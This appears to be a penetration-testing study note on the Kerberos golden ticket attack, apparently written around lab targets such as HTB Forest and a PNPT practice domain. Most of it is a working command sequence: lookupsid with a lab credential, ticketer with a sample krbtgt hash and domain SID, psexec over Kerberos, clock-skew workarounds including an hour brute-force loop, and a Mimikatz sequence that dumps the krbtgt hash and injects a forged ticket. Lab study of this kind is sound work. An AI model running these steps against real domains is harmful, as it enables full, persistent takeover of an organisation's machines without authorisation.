Golden Ticket Attack

Overview

A golden ticket is a forged Kerberos TGT. The KDC encrypts and signs every TGT with the key of the krbtgt account, so once we hold the krbtgt NT hash we can mint TGTs for any user, with any group membership, and every service in the domain will accept them. That gives us access to every machine in the domain, and the forged tickets keep working until the krbtgt password has been reset twice (the KDC keeps the previous key as well as the current one).

The krbtgt hash comes from a Domain Controller, either by dumping it with Mimikatz on the DC or through DCSync. The ticket itself can then be forged either with Mimikatz on the DC or with impacket-ticketer from our own machine.

Golden Ticket Attack via Ticketer

First get the domain SID. impacket-lookupsid runs from the attacking host against the DC and only needs a valid set of domain credentials:

impacket-lookupsid pnpt.local/adot:'texas'@192.168.1.10

impacket-ticketer -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> <user_name>

The NT hash must be the krbtgt account's hash (from a DCSync or an NTDS.dit dump, e.g. impacket-secretsdump), not the Administrator hash, and the domain SID is the S-1-5-21-... value with no trailing RID. Example (HTB Forest):

impacket-ticketer -nthash '819af826bb148e603acb0f33d17632f8' -domain-sid S-1-5-21-3072663084-364016917-1341370565 -domain htb.local Administrator
export KRB5CCNAME=Administrator.ccache

Add the domain and the DC's hostname to /etc/hosts. Kerberos authenticates to a service by name (the hostname becomes part of the SPN in the service ticket), so psexec has to be pointed at the hostname, not the IP, and that name must resolve:

impacket-psexec htb.local/administrator@forest -k -no-pass

Kerberos rejects requests whose timestamps are more than 5 minutes (the default tolerance) off the DC's clock, so the attacking host may need its clock set to match the DC. nmap's smb2-time / clock-skew output shows the DC's time; set yours to it:

sudo date -s 21:36:00

Alternatively sync straight from the DC with sudo ntpdate <dc_ip>. If you only know the minutes from the scan, brute-force the hour until psexec accepts the ticket (the target is the same one used above):

for h in $(seq -w 0 23); do sudo date -s "$h:36:00"; impacket-psexec htb.local/administrator@forest -k -no-pass; done


Golden Ticket Attack via Mimikatz

In a shell on the Domain Controller (as local admin or SYSTEM, which privilege::debug requires):

mimikatz.exe
privilege::debug
lsadump::lsa /inject /name:krbtgt
Note down the domain SID and the NTLM hash of the krbtgt account. lsadump::lsa prints the domain SID at the top of its output; if you copy the SID from the krbtgt object instead, drop the trailing -502 RID, because /sid: expects the domain SID.
kerberos::golden /user:Administrator /domain:PNPT.local /sid:S-1-5-21-XXX /krbtgt:11f843XXX /id:500 /ptt
misc::cmd
psexec \\DESKTOP-ILG11 cmd.exe

/ptt injects the forged TGT straight into the current logon session rather than writing a .kirbi file, misc::cmd opens a cmd.exe that inherits that session, and the psexec in that window is Sysinternals PsExec, which authenticates to the target with the injected ticket.
